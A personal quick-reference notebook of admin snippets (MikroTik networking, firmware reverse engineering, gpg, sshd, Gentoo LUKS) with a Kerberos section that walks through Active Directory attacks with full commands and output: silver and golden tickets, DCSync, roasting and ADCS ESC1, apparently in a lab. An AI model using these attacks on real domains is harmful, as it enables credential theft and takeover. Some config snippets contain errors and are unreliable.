Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

About

Usually documentation (if any) of certain utilities and applications is all over the place and, there is no indication whether certain information has higher priority and is used more often. Furthermore, when you attempt to use the technology, it often fails to work as described under the given conditions.

Because of this I've decided to create this repository to document tested techniques and practical usage examples for different types of technology I come across in a form of quick references.

This is very far from being complete: I will be slowly populating this repository with content from my local notes, I have lots of things to share.

All content on this blog is intended solely for educational purposes, research, authorized assessments. The author assumes no responsibility for any misuse of the information provided.

VLAN

frame-types:

# only tagged traffic will be send out (set this on trunk ports) 
# (if you send it on bridge it means that only tagged traffic will be send OUT OF THE TRUNK PORT)
# be carefull setting this because you will not be able to send packets from the router itself out of trunk ports
frame-types=admit-only-vlan-tagged

# only untagged traffic will be send out (set this on access ports)
frame-types=admit-only-untagged-and-priority-tagged

VLAN switching:

# {https://forum.mikrotik.com/viewtopic.php?t=180903}
# add bridge for vlan switching (a single bridge should be used generaly (if multiple bridges are used - bringing will not be able to be hardware-offloaded (i.e. more CPU load)))
/interface/bridge/add name=vlan-br-1 vlan-filtering=yes # WARNING!!! if you're connected to router remotely FIRST OMIT vlan-filtering option, sinse it will break the connection (???)
# priority=0x5000 - possible if you wanna adjust STP (or MSTP/RSTP) priority value (the lower the priority the more chance it'll become the root bridge)
# frame-types=admit-only-vlan-tagged - POSSIBLE, BUT DANGEROUS

# attach physical interface to a virtual bridge interface (trunk). Don't forget to add appropriate bridge VLAN table entries
/interface/bridge/port/add bridge=vlan-br-1 interface=ether1
# frame-types=admit-only-vlan-tagged - POSSIBLE, BUT DANGEROUS (not required)

# attach physical interface to a virtual bridge interface (access). Don't forget to add appropriate bridge VLAN table entries
/interface/bridge/port/add bridge=vlan-br-1 interface=ether2 pvid=20
/interface/bridge/port/add bridge=vlan-br-1 interface=ether3 pvid=30
# frame-types=admit-only-untagged-and-priority-tagged - POSSIBLE, BUT DANGEROUS (not required)

# add a bridge VLAN table entry for each bridge port (if multiple interfaces are connected to ONE VLAN specify them), untagged interfaces are ones that will be linked with a VLAN itself
# and set /ip/dns/set allow-remote-requests=yes
# REPEAT that sequence on each switch that stands in a way
/interface/bridge/vlan/add bridge=vlan-br-1 tagged=ether1,vlan-br-1 untagged=ether2 vlan-ids=20
/interface/bridge/vlan/add bridge=vlan-br-1 tagged=ether1,vlan-br-1 untagged=ether3,ether4 vlan-ids=30

# Add a vlan interface (enable VLAN tagging for a particular VLAN (10) on a specific interface (ether2)) (don't forget to add an address to it and a coresponding entry in a bridge-VLAN table afterwards)
/interface/vlan/add name=vlan-20 vlan-id=20 interface=vlan-br-1
/interface/vlan/add name=vlan-30 vlan-id=30 interface=vlan-br-1
# add upstream address for clients
/ip/address/add address=10.10.20.1/24 interface=vlan-20 # don't forget to write different addresses on second router for VRRP
/ip/address/add address=10.10.30.1/24 interface=vlan-30


# on each router / managed switch that stands in a way enable NAT masquerade
/ip/firewall/nat/add chain=srcnat out-interface=vlan-br-1 action=masquerade


# afterwards you can create a dhcp server (interface=vlanX)
ip/pool/add name=vlan-20-pool ranges=192.168.20.100-192.168.20.200
/ip/dhcp-server/add interface=vlan-20 address-pool=vlan20-pool name=vlan-20-dhcp
/ip/dhcp-server/network/add address=192.168.20.0/24 dns-server=192.168.20.1 gateway=192.168.20.1 netmask=24
ip/pool/add name=vlan-30-pool ranges=192.168.30.100-192.168.30.200
/ip/dhcp-server/add interface=vlan-30 address-pool=vlan30-pool name=vlan-30-dhcp
/ip/dhcp-server/network/add address=192.168.30.0/24 dns-server=192.168.30.1 gateway=192.168.30.1 netmask=24

## if you're configuring VXLAN - clients should already be able to reach each other on both sides of VXLAN
## if you want your routers to be reachable, on both routers assign single-subnet address ON A BRIDGE
# R1
/ip/address/add address=172.16.102.1/24 interface=vlan-br-1
# R2
/ip/address/add address=172.16.102.2/24 interface=vlan-br-1

OPTIONAL: add VRRP

### MIRROR THIS CONFIGURATION ON A SECOND ROUTER, BUT WITH DIFFERENT PRIORITY
/interface vrrp add name=vrrp-m-20 interface=vlan-20 vrid=20 priority=200
/interface vrrp add name=vrrp-m-30 interface=vlan-30 vrid=30 priority=200

# pay attention: addresses should be reachable from clients on VLAN
# This SHOULD be /32 !!!
/ip address add address=192.168.20.3/32 interface=vrrp-m-20
/ip address add address=192.168.30.3/32 interface=vrrp-m-30

/ip/dhcp-server/network/add address=192.168.20.0/24 gateway=192.168.20.3 dns-server=192.168.20.3
/ip/dhcp-server/network/add address=192.168.30.0/24 gateway=192.168.30.3 dns-server=192.168.30.3

OPTIONAL: VLAN isolation

add action=drop chain=forward dst-address=192.168.55.0/27 src-address=192.168.80.0/24

VRRP

  1. vrid is an ID of a VIRTUAL router, each needs to have a unique ID.
  2. authentication=none is default (TODO) non-none values are only supported if version != 3
  3. priority=100 is default (Higher priority wins!)
  4. Upon entering a backup state the IP address assigned to VRRP interface SHOULD become Invalid, this is expected!
#    |----|          |----|  
#    | R1 |          | R2 |
#    |----| ether2   |----|
#       |  \__    __/  | <------ ether1
#       |     \__/     |
#    |----|___/  \___|----|      
#    | S1 |          | S2 |
#    |----|==========|----|


### R2:
# OPT: real iface address:
/ip address add address=192.168.1.1/24 interface=ether1

# can be assigned on VLAN interface (interface=vlan-20)
/interface vrrp add name=vrrp-1 interface=ether1 vrid=1 priority=250
/interface vrrp add name=vrrp-1 interface=ether1 vrid=1 priority=250 authentication=ah password=somepass1 version=2
# OPT: if you have multiple gateways on downstream switches:
/interface vrrp add name=vrrp-2 interface=ether1 vrid=2 priority=240 authentication=ah password=somepass2 version=2
# OPT: if you have multiple downstream nodes interconnected with VRRP routers in mesh for redundancy:
# priorities should be set to higher values on a master router. vrid should be the same on all interfaces that have
# the same VIP address
/interface vrrp add name=vrrp-3 interface=ether2 vrid=1 priority=230 authentication=ah password=somepass1 version=2

# virtual addresses (HAVE TO BE /32):
# you CAN assign multiple ip addresses to a single VRRP interface and single VRID
/ip address add address=192.168.1.101/32 interface=vrrp-1
# OPT: if you have multiple gateways on downstream switches:
/ip address add address=10.10.1.102/32 interface=vrrp-2
# OPT: if you have multiple downstream nodes interconnected with VRRP routers in mesh for redundancy:
/ip address add address=192.168.1.101/32 interface=vrrp-3

VXLAN

### on customer's side you CAN also configure VLANs to separate traffic

### R1 (IP : 10.0.0.1)
/interface vxlan add name=vxlan-vni-102 vni=102
/interface vxlan vteps add interface=vxlan-vni-102 remote-ip=10.0.0.2
/interface/bridge/add name=vxlan-br-102
# ether12 goes to customer's router
/interface/bridge/port/add interface=ether12 bridge=vxlan-br-102
/interface/bridge/port/add interface=vxlan-vni-102 bridge=vxlan-br-102

### R2 (IP : 10.0.0.2)
/interface vxlan add name=vxlan-vni-102 vni=102
/interface vxlan vteps add interface=vxlan-vni-102 remote-ip=10.0.0.1
/interface/bridge/add name=vxlan-br-102
# ether12 goes to customer's router
/interface/bridge/port/add interface=ether12 bridge=vxlan-br-102
/interface/bridge/port/add interface=vxlan-vni-102 bridge=vxlan-br-102

VPLS

Scenario: 2 routers in different locations, 1 customer on both sides wanting a connectivity between these 2 sites.

# R1 (IP : 10.0.0.1)
/interface/bridge/add name=vpls-tun-1
# vpls-id is just a tunnel identifier, usually AS number
# note the X:X format !!!
/interface/vpls/add name=vpls-tun-4-3 vpls-id=1:102 peer=10.0.0.2

## join route-to-customer and vpls-tunnel together using a bridge
#  add vpls tunnel to bridge
/interface/bridge/port/add interface=vpls-tun-4-3 bridge=vpls-tun-1
# add customer-facing interface to a bridge
/interface/bridge/port/add interface=ether4 bridge=vpls-tun-1


# R2 (IP : 10.0.0.2)
/interface/bridge/add name=vpls-tun-1
/interface/vpls/add name=vpls-tun-3-4 vpls-id=1:102 peer=10.0.0.2
/interface/bridge/port/add interface=vpls-tun-4-3 bridge=vpls-tun-1
/interface/bridge/port/add interface=ether4 bridge=vpls-tun-1

# check
/interface/vpls/monitor

Clients now can set an address on upstream interfaces (that're connected to your routers) and communicate with each other on the same subnet (ofc you do NOT need to set any addresses on your routers)

OSPF

  1. seems to not work with LAG in GNS3
  2. To enable the use of BFD for OSPF neighbors, enable use-bfd for required entries in /routing ospf interface-template menu. (see BFD section)
# create a loopback for fault tolerance
/interface/bridge/add name=Lo0

# first assign IP addresses
/ip/address/add interface=Lo0 address=10.0.0.4/32
/ip address add address=192.168.0.3/24 interface=ether1
/ip address add address=192.168.1.3/24 interface=ether2

# router-id 1.0.0.{host-num}. migrate to loopback ???
/routing ospf instance add name=ospfv2-inst version=2 router-id=10.0.0.4
# area-id is usually, 0.0.0.0, 1.1.1.1, 2.2.2.2, etc.
/routing ospf area add name=ospfv2-a0 area-id=0.0.0.0 instance=ospfv2-inst

### if interfaces are not specified ROS will detect automatically!
### use-bfd can be ommited! if it's not - see *BFD for bfd configuration
/routing ospf interface-template add networks=192.168.0.0/24,192.168.1.0/24,10.0.0.4/32 area=ospfv2-a0 interfaces=ether3,bond-9-2,Lo0 use-bfd=yes

# allow ospf traffic (is not needed if no rules are present)
/ip firewall filter add action=accept chain=input protocol=ospf

BFD

# enable BFD on interfaces (you can just use interfaces=all)
# `min-tx/min-rx = 1` means 1 second interval
/routing/bfd/configuration/add interfaces=ether5,ether6,ether7,ether8 min-tx=1 min-rx=1
# then in OSPF/BGP/whatever config set use-bfd=yes on an interface so that it will send BFD hello packets

DoH

# set the cloudflare server ("servers" is to resolve the DoH server itself, use-doh-server is a DoH server address)
/ip/dns/set verify-doh-cert=yes allow-remote-requests=yes doh-max-concurent-queries=100 doh-max-server-connections=20 doh-timeout=6s servers=1.1.1.1,1.0.0.1 use-doh-server=https://cloudflare-dns.com/dns-query

# fetch the downloaded cert chain
/tool/fetch url=http://192.168.60.1:9595/one-one-one-chain.pem
/file/print

/certificate/import file-name=one-one-one-chain.pem
# certificates-imported: 3

UEFI

EFI shell

Installing EFI shell:

### the standard EFI boot binary location is /efi/boot/bootx64.efi
mount /dev/sdb1 /efi && cd /efi
mkdir EFI/boot && cd EFI/boot
wget https://github.com/tianocore/edk2/raw/UDK2018/ShellBinPkg/UefiShell/X64/Shell.efi -O bootx64.efi

Usage:

# show mapping table
map

# set directory to storage device
$DEVICE_NAME:
# e.g.
FS0:

# load an EFI driver
load ./bin.efi

# execute a binary
./path/to/bin

ESP

ESP8266

prepare env

ESP8266 Core pkg

# confirm connected
arduino-cli board list

# update the core package index
arduino-cli core update-index

# initialize config
arduino-cli config init

# add additional board url (repo)
arduino-cli config add board_manager.additional_urls https://arduino.esp8266.com/stable/package_esp8266com_index.json

# update core index
arduino-cli core update-index

# search repos to confirm the newly installed repo is in the list
arduino-cli core search

# install package
arduino-cli core install esp8266:esp8266

# confirm installation
arduino-cli core list

esptool

# display info about the chip, including the flash size
esptool.py --chip esp8266 --port /dev/ttyUSB0 flash_id
# Manufacturer: 68
# Device: 4016
# Detected flash size: 4MB

# dump flash memory from 0 to 4MB to a file called full_flash.bin
esptool.py --chip esp8266 --port /dev/ttyUSB0 read_flash 0x00000 0x400000 full_flash.bin

FW RE

binwalk

# recursive extract
binwalk -Me 01-00000010-U00000010.bin

# attempt to extract each datatype from it's starting address to it's ending address
ls -l _01-00000010-U00000010.bin.extracted

extract Lnux from zImage compressed with LZMA

vmlinux-to-elf

./vmlinux-to-elf <input_kernel.bin> <output_kernel.elf>

mount jffs2, because binwalk is unable to

mount.jffs2

  binwalk -Mqe 01-00000024-U00000024.bin

  cd _01-00000024-U00000024.bin.extracted/_0.extracted

  mkdir jffs2_root

  sudo mount.jffs2 0.jffs2 jffs2_root
  # Sanity check passed...
  # Image 0.jffs2 sucessfully mounted on jffs2_root

  cd jffs2_root && ls
  # bin  cfez.bin  config  lib  Megafon  webroot

unpack android bootimg

android-unpackbootimg

mkdir kernel && unpackbootimg -i 03-00030000-Kernel.bin -o kernel && cd kernel
# Android magic found at: 128
# BOARD_KERNEL_CMDLINE root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0,115200 rdinit=/init loglevel=5 mem=0x9200000
# BOARD_KERNEL_BASE 55e08000
# BOARD_NAME
# BOARD_PAGE_SIZE 2048
# BOARD_HASH_TYPE sha1
# BOARD_KERNEL_OFFSET 00008000
# BOARD_RAMDISK_OFFSET 01000000
# BOARD_SECOND_OFFSET 00f00000
# BOARD_TAGS_OFFSET 00000100

Huawei

balongflash

About Huawei LTE routers

4PDA

AT commands

KRB5

Silver Ticket

# get domain SID
impacket-lookupsid contoso.org/Administrator@192.168.68.179
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# Password:
# [*] Brute forcing SIDs at 192.168.68.179
# [*] StringBinding ncacn_np:192.168.68.179[\pipe\lsarpc]
# [*] Domain SID is: S-1-5-21-245103785-2483314120-3684157271
# ...




ldapsearch -LLL -x -H ldap://192.168.68.179 -D 'Administrator@contoso.org' -w 'win2016-cli-P@$swd1!' -b 'dc=contoso,dc=org'
# dn: CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=contoso,DC=org
# objectClass: top
# objectClass: person
# objectClass: organizationalPerson
# objectClass: user
# objectClass: computer
# cn: WIN-NUU0DPB1BVC
# distinguishedName: CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=contoso,DC=org
# ...
# serverReferenceBL: CN=WIN-NUU0DPB1BVC,CN=Servers,CN=Default-First-Site-Name,CN
#  =Sites,CN=Configuration,DC=contoso,DC=org
# dNSHostName: WIN-NUU0DPB1BVC.contoso.org
# rIDSetReferences: CN=RID Set,CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=conto
#  so,DC=org
# servicePrincipalName: RPC/bd05490f-2c96-4f89-9201-c530cfa7eda4._msdcs.contoso.
#  org
# servicePrincipalName: GC/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC/CONTOSO
# servicePrincipalName: ldap/bd05490f-2c96-4f89-9201-c530cfa7eda4._msdcs.contoso
#  .org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/CONTOSO
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/ForestDnsZones.contoso.
#  org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/DomainDnsZones.contoso.
#  org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/bd05490f-2c96-4f89-
#  9201-c530cfa7eda4/contoso.org
# servicePrincipalName: DNS/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org/CONTOSO
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC/CONTOSO
# servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-NUU0DPB1BV
#  C.contoso.org
# servicePrincipalName: TERMSRV/WIN-NUU0DPB1BVC
# servicePrincipalName: TERMSRV/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: WSMAN/WIN-NUU0DPB1BVC
# servicePrincipalName: WSMAN/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: RestrictedKrbHost/WIN-NUU0DPB1BVC
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC
# servicePrincipalName: RestrictedKrbHost/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org
# ...



# you can use any online NTLM hash generator to obtain -nthash if you only have password

# generate TGS that is signed with service account's kerberos key (derived from -nthash) 
# for the target user "Administrator" and target SPN MSSQLSvc and apply 512 group to that user
### DONT FORGET TO FIX THE CLOCK SKEW
sudo ntpdate 192.168.68.64 && sudo impacket-ticketer -nthash fd72ca83b31d63f864440afa274bbd0c -domain-sid S-1-5-21-245103785-2483314120-3684157271 -domain contoso.org -spn HOST/WIN-KML6TP4LOOL Administrator
# 2025-02-20 02:31:38.877088 (+1100) +0.101192 +/- 0.000193 192.168.68.64 s1 no-leap
# Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for contoso.org/Administrator
# [*]     PAC_LOGON_INFO
# [*]     PAC_CLIENT_INFO_TYPE
# [*]     EncTicketPart
# /usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
# encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
# [*]     EncTGSRepPart
# [*] Signing/Encrypting final ticket
# [*]     PAC_SERVER_CHECKSUM
# [*]     PAC_PRIVSVR_CHECKSUM
# [*]     EncTicketPart
# [*]     EncTGSRepPart
# [*] Saving ticket in Administrator.ccache
# Ticket cache: FILE:Administrator.ccache
# Default principal: Administrator@CONTOSO.ORG

Golden ticket

impacket-secretsdump -outputfile secretsdump.txt 'contoso.org'/'Administrator':'win2016-cli-P@$swd1!'@'192.168.68.64'

cat secretsdump.txt.ntds
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:c70399550b62d5f52c84b2a2fad7b41a:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60fcae2d99c85fb300602b91223f9516:::
# ...

impacket-lookupsid contoso.org/Administrator@192.168.68.64
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# Password:
# [*] Brute forcing SIDs at 192.168.68.64
# [*] StringBinding ncacn_np:192.168.68.64[\pipe\lsarpc]
# [*] Domain SID is: S-1-5-21-245103785-2483314120-3684157271
# ...

sudo impacket-ticketer -nthash '60fcae2d99c85fb300602b91223f9516' -domain-sid 'S-1-5-21-245103785-2483314120-3684157271' -domain 'contoso.org' 'Administrator'
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for contoso.org/Administrator
# [*]   PAC_LOGON_INFO
# [*]   PAC_CLIENT_INFO_TYPE
# [*]   EncTicketPart
# [*]   EncAsRepPart
# [*] Signing/Encrypting final ticket
# [*]   PAC_SERVER_CHECKSUM
# [*]   PAC_PRIVSVR_CHECKSUM
# [*]   EncTicketPart
# [*]   EncASRepPart
# [*] Saving ticket in Administrator.ccache

Roasting

ASREPRoast

impacket-GetNPUsers -format hashcat -outputfile ASREProastables.txt -dc-ip $KDC_IP -request "$DOMAIN/$USER:$PASSWD"
# impacket-GetNPUsers -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.68.64 -request 'CONTOSO.ORG/TestAlpha:win10-gui-P@$swd'
# use 'CONTOSO.ORG/' for unauthenticated bind

TGSREPRoast

# perform kerberoasting without preauth (AS-REQ) (when a user has DONT_REQ_PREAUTH)
impacket-GetUserSPNs -no-preauth "$USER" -usersfile $USERS_FILE -dc-host $KDC_IP $DOMAIN/ -request
# impacket-GetUserSPNs -no-preauth "AltAdmLocal" -usersfile users.txt -dc-host 192.168.68.64 contoso.org/ -request

# perform kerberoasting knowing user's password
impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip $KDC "$DOMAIN/$USER:$PASSWD"
# impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip 192.168.68.64 'contoso.org/TestAlpha:win10-gui-P@$swd'


# request a TGS for a single specific kerberoastable user (Ethan, in this case)
impacket-GetUserSPNs -request-user 'ethan' -dc-ip 10.10.11.42 'administrator.htb'/'emily':'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

ESC*

ESC1

# enumerate existing templates
certipy-ad find -scheme ldap -u TestAlpha@contoso.org -p 'win10-gui-P@$swd' -dc-ip 192.168.68.64 -stdout -vulnerable -enabled
# Certificate Authorities
#   0
#     CA Name                             : contoso-WIN-KML6TP4LOOL-CA-9
# ...
# 
# Certificate Templates
#   0
#     Template Name                       : Workstation
#     Display Name                        : Workstation Authentication
#     Certificate Authorities             : contoso-WIN-KML6TP4LOOL-CA-9
#     Enabled                             : True
#     Client Authentication               : True
#     Extended Key Usage                  : Client Authentication
#     Requires Manager Approval           : False
#     Validity Period                     : 1 year
#     Renewal Period                      : 6 weeks
#     Minimum RSA Key Length              : 2048
#     Permissions
#       Enrollment Permissions
#         Enrollment Rights               : CONTOSO.ORG\Domain Admins
#                                           CONTOSO.ORG\Authenticated Users
#     [!] Vulnerabilities
#       ESC1                              : 'CONTOSO.ORG\\Domain Computers' and 'CONTOSO.ORG\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

##############
### TEST-1 ### PKINIT not supported
##############
### WARNING ::: you cannot use shadow credentials certificates to logon to LDAP, only legitimately obtained one! it has to be signed with the CA.

certipy-ad req -u TestAlpha@contoso.org -p 'win10-gui-P@$swd' -target WIN-KML6TP4LOOL.contoso.org -ca contoso-WIN-KML6TP4LOOL-CA-9 -template Workstation -upn administrator@contoso.org -dc-ip 192.168.68.64 -debug
# [*] Successfully requested certificate
# [*] Got certificate with UPN 'administrator@contoso.org'
# [*] Saved certificate and private key to 'administrator.pfx'

# attempt to request a TGT using PKINIT
# if you get the following error that means DC's KDC certificate doesn't support PKINIT (because DC's certificate doesn't have "KDC Authentication" EKU)
certipy-ad auth -pfx ./administrator.pfx -dc-ip 192.168.68.64 -domain contoso.org
# [*] Using principal: administrator@contoso.org
# [*] Trying to get TGT...
# [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

# got an error, so let's authenticate to LDAPS using mTLS then (passthecert.py)
# export public and private keys from a pfx file to a separate files
certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key
# [*] Writing private key to 'administrator.key'
certipy-ad cert -pfx administrator.pfx -nokey -out administrator.cert
# [*] Writing certificate and  to 'administrator.cert'

# use certificates for mTLS LDAPS bind instead of PKINIT. This will rely on LDAP privileges the user has.
python3 ../utils/passthecert.py -action ldap-shell -crt administrator.cert -key administrator.key -domain contoso.org -dc-ip 192.168.68.64
# whoami
# # u:CONTOSO\Administrator


##############
### TEST-2 ### PKINIT supported
##############
# trying to get a TGT using a computer account (WIN-NUU0DPB1BVC) certificate
# the KDC (192.168.68.179) should have a certificate with "KDC Authentication" EKU issued
# after we got a TGT it tries to abuse U2U to itself (*see krb5.norg -> U2U abuse*) 
# in order to retrieve NT hash
certipy-ad auth -pfx ./WIN-NUU0DPB1BVC\$.pfx -dc-ip 192.168.68.179 -domain contoso.org -debug
# [*] Using principal: win-nuu0dpb1bvc$@contoso.org
# [*] Got TGT
# [*] Saved credential cache to 'win-nuu0dpb1bvc.ccache'
# [*] Got hash for 'win-nuu0dpb1bvc$@contoso.org': aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137


# we can request an ST for that computer using hashes
export KRB5CCNAME='win-nuu0dpb1bvc.ccache'
impacket-getST -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 -spn CIFS/WIN-KML6TP4LOOL.contoso.org -dc-ip 192.168.68.64 contoso.org/WIN-NUU0DPB1BVC
# [*] Getting ST for user
# [*] Saving ticket in WIN-NUU0DPB1BVC@CIFS_WIN-KML6TP4LOOL.contoso.org@CONTOSO.ORG.ccache

# let's pass-the-hash to DCSync using impacket-secretsdump
export KRB5CCNAME='WIN-NUU0DPB1BVC@CIFS_WIN-KML6TP4LOOL.contoso.org@CONTOSO.ORG.ccache'
impacket-secretsdump -outputfile contoso.org.dump -k WIN-KML6TP4LOOL.contoso.org

# we can also perform secretsdump using just hashes (NOTE THE '$' SIGN AFTER COMPUTERNAME !!!!)
impacket-secretsdump -outputfile contoso.dump -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 'CONTOSO.ORG/WIN-NUU0DPB1BVC$@192.168.68.64'

Crypto

gpg

# generate the key
gpg --full-gen-key

# Signature verification example
gpg --keyserver-options auto-key-retrieve --verify Downloads/archlinux-2023.09.01-x86_64.iso.sig Documents/archlinux-2023.09.01-x86_64.iso

# pass
gpg --full-gen-key
gpg --list-keys
gpg --edit-key user-id                # Edit key

### MESSAGE EXCHANGE
# export public key from a keyring to a file
gpg --output $FILE --export $KEY_UID            # add --armor to export in ASCII
# sign a file with a public key 
gpg --output $OUT_FILE --encrypt --recipient $KEY_UID $FILE

pass

gpg --full-gen-key
pass init $GPG_ID                   # will reencrypt

# Usage
pass ls                             # list passwords
pass insert dir/file                # Insert password
pass -c dir/file                    # Copy password to clipboard
pass edit dir/file                  # Insert other fields
pass generate dir/file $NUM         # Generate password

# change pass dir (should have .gpg-id file)
PASSWORD_STORE_DIR=/mnt/sda1/my/password/storage

sshd

Reasonably secure setup

  1. Change sshd security settings
######## /etc/ssh/sshd_config
### do NOT install sudo

### DISABLE ROOT LOGIN
AllowUsers $USERNAME $USERNAME
PermitRootLogin no

### DISABLE PASSWORD AUTHENTICATION
PasswordAuthentication no
KbdInteractiveAuthentication no
UsePAM no
PubkeyAuthentication yes

### REQUIRE BOTH PASSWORD AND PRIVATE KEY
AuthenticationMethods "publickey,password"
PasswordAuthentication yes

### change default port
Port 5555
  1. Enable FW
ufw enable
  1. Create an unprivileged user
adduser myuser
  1. Setup autoupdate
### DEBIAN
sudo apt update && sudo apt upgrade
sudo apt install unattended-upgrades

# /etc/apt/apt.conf.d/50unattended-upgrades
# ensure the following are present. (they are present by default)
"origin=Debian,codename=${distro_codename},label=Debian";
"origin=Debian,codename=${distro_codename},label=Debian-Security";
"origin=Debian,codename=${distro_codename}-security,label=Debian-Security";

sudo systemctl start unattended-upgrades
sudo systemctl enable unattended-upgrades

# observe
cat /var/log/unattended-upgrades/unattended-upgrades.log
  1. Setup port knocking
# install knockd
apt install knockd

### /etc/knockd.conf
[options]
UseSyslog
Interface = enp3s0

[SSH]
sequence    = 7000,8000,9000
seq_timeout = 5
tcpflags    = syn
start_command = ufw allow from %IP% to any port 5555
stop_command = ufw delete allow from %IP% to any port 5555
cmd_timeout   = 60


### /etc/default/knockd
START_KNOCKD=1
KNOCKD_OPTS="-i enp3s0"

# usage with port knocking
for ports in 7000 8000 9000; do nmap -Pn --max-retries 0 -p $ports 46.1 $MY_SRV; done
ssh -i $SSH_KEY_PATH -p 5555 myuser@$MY_SRV

git server

manual setup

groupadd git 
# useradd -m -g git -d /var/git -s /usr/bin/git-shell git
useradd -m -g git -d /var/git -s /bin/bash git
sudo mkdir /var/git/.ssh && sudo chmod 700 /var/git/.ssh
sudo touch /var/git/.ssh/authorized_keys && sudo chmod 600 /var/git/.ssh/authorized_keys
# write a public key there

cd /var/git
mkdir project.git
cd project.git
git init --bare
# Initialized empty Git repository in /srv/git/project.git/
sudo chown --recursive git:git /var/git

### /etc/conf.d/git-daemon
GIT_USER="git"
GIT_GROUP="git"
GITDAEMON_OPTS="--syslog --export-all --enable=receive-pack --base-path=/var/git"


sudo mkdir /var/git
sudo chown git:git /var/git
# ENSURE GITD DAEMON IS RUNNING FIRST
rc-service git-daemon start

# for any port!
git remote add origin ssh://git@192.168.1.69/var/git/nvim_vault.git

gentoo

About

doc: gentoo

  1. Passwords and keys protect keyslots on the LUKS header, which contains the master key that actually encrypts the partition data.
  2. The header file must be kept safe. If the header file is lost, all data on the LUKS partition it secured will be irrecoverable.
  3. For this, use system with the same kernel as target system
  4. This setup will require the usage of initramfs, because there should be a pre-fs to decrypt the primary fs.

Process

### PARTITION AS FOLLOWS (see gentoo doc link)
# sda1 will hold GRUB
# sda2 will hold luks header and initramfs
# if a keyfile will be encrypted ASYMMETRICALLY, yubikey smartcard can be used
/dev/sda
├── /dev/sda1      [EFI]   /efi      1 GB         fat32       Bootloader
└── /dev/sda2      [BOOTX] /boot     1 GB         ext4        Bootloader support files, kernel and initramfs
/dev/nvme0n1
└── /dev/nvme0n1p1 [ROOT]  (root)    ->END        luks        Encrypted root device, mapped to the name 'root'
└──  /dev/mapper/root /         ->END        btrfs       root filesystem
/home     subvolume                Subvolume created for the home directory
/var      subvolume                Subvolume created for the var directory
/etc      subvolume                Subvolume created for the etc directory
  • encrypt the fs
### IF YOU WANT TO USE SMARTCARD / YUBIKEY USE ASYMMETRIC ENCRYPTION INSTEAD
# GPG Symmetrically Encrypted Key File (don't forget to move it to boot drive later):
dd bs=8388608 count=1 if=/dev/urandom | gpg --symmetric --cipher-algo AES256 --output crypt_key.luks.gpg
# Secure the partition using a GPG protected key file:
gpg --decrypt crypt_key.luks.gpg | cryptsetup luksFormat --key-size 512 /dev/nvme0n1p1 -
# backup header file (don't forget to move it to separate drive)
cryptsetup luksHeaderBackup /dev/nvme0n1p1 --header-backup-file crypt_headers.img
# mount the encrypted root:
export GPG_TTY=$(tty)
sudo gpg --decrypt crypt_key.luks.gpg | sudo cryptsetup --key-file - open /dev/nvme0n1p1 root
  • mount root and format drives
### FORMAT AS FOLLOWS:
# boot drive:
mkfs.vfat -F32 /dev/sda1
# make ext4 fs with "boot" label
mkfs.ext4 -L boot /dev/sda2

# root drive (if btrfs) with "rootfs" label
mkfs.btrfs -L rootfs /dev/mapper/root

# format root drive (if btrfs (if not btrfs - create as separate partitions))
mount LABEL=rootfs /mnt/gentoo
btrfs subvolume create /mnt/gentoo/etc
btrfs subvolume create /mnt/gentoo/home
btrfs subvolume create /mnt/gentoo/var
  • obtain stage tarball & unpack
cd /mnt/gentoo
# set time
chronyd -q
# download the H/SELinux stage3 from here (ENSURE HTTPS!!!)
